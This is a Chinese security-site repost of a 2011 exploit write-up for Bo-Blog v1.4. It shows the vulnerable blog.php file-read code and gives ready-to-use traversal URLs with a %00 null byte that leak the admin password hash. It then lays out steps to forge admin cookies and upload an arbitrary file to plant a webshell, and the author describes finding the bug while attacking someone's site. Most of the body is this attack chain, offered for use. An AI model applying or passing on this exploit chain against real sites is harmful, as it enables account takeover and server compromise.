首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
Bo-Blog v1.4 单用户版分类列表文件读取漏洞 + 拿 WebShell
来源:http://www.t00ls.net 作者:t00ls 发布时间:2011-08-22  
这个是前几天,干某人站,发现用的这套程序,于是就下了一套研究(坑爹啊,04年的Blog程序现在居然还有人用,不过现在这位同学换了Blog程序,发出来也不怕万人轮了),挖了几个漏洞,这是其中一个,这套程序除了这个漏洞,还有各种XSS(取Cookie直接叼Shell,见下文)、文件包含、配置文件写马、文件读取……

因为这个系统没有数据库,所以采用的是纯文本格式储存各种数据,留言什么的居然都是直接储存在“*.php”文件中,坑爹啊、这是……,还好过滤做的比较严,不然又直接叼 Shell、。。
By:Nuclear'Atk

From:http://lcx.cc/?FoxNews=1679.html

漏洞名称:

    Bo-Blog v1.4 单用户版分类列表文件读取漏洞 + 拿 WebShell

漏洞文件:

    blog.php

漏洞代码:

  1. if ($job=="showcat") {  //列出某个分类下所有entries   
  2. if (!file_exists("$dirblog/$cat.php")) {   
  3.  wronginfo("没有找到这个分类。");   
  4. }   
  5. unset ($allfiles);   
  6. $allfiles=@file("$dirblog/$cat.php");  
利用条件:
    Null
漏洞原因:

    在文件“blog.php”中,功能“分类列表”。

    参数“cat=”没有经过任何处理,直接使用“$allfiles=@file("$dirblog/$cat.php");”读文件。

    导致如果提交文件名,那么就会直接读取该文件处理输出。

漏洞测试:

    1、读 index.htm:http://127.0.0.1/blog.php?job=showcat&cat=../index.htm%00

漏洞利用:
    1、读 $dirblog/userid.php:http://127.0.0.1/blog.php?job=showcat&cat=userid

    2、读 /diruser/userid.php:http://127.0.0.1/blog.php?job=showcat&cat=../diruser/userid8

    利用本漏洞可以直接拿 WebShell,步骤如下:

    1、访问:http://127.0.0.1/blog.php?job=showcat&cat=../diruser/userid(或:http://127.0.0.1/blog.php?job=showcat&cat=userid,取决于博客配置的路径地址),得到管理密码 Hash 值。

    2、访问:http://127.0.0.1/profile.php,得到管理账号。

    3、由于这个程序把账号和管理密码Hash值放到Cookies中进行登录验证,所以拿到账号和管理密码Hash值就可以直接登陆了,根本不需要破解。

    4、修改 Cookies:lastvisit=lastvisit; nowuserid=管理ID; nowuserpassword=管理密码Hash值

    5、刷新页面,已经登陆进去了,然后访问:http://127.0.0.1/mblog_upload.php,可以上传任意文件,拿到 WebShell。

其他信息:


来源:t00ls


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·WordPress多个插件注入漏洞
·discuz sessoin hijack tips 续
·Nginx %00空字节执行php漏洞
·discuz sessoin hijack tips
·EasySiteEdit远程文件包含缺陷及
·DEDECMS全局变量覆盖漏洞科普
·PHP168 V6.02 整站系统远程执行
·WordPress 严重的远程备份执行代
·DEDECMS拿SHELL EXP
·PHP 跨目录档案上传漏洞
·DEDECMS爆严重安全漏洞 免账号密
·智有道专业旅游系统 v1.0 注入及
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved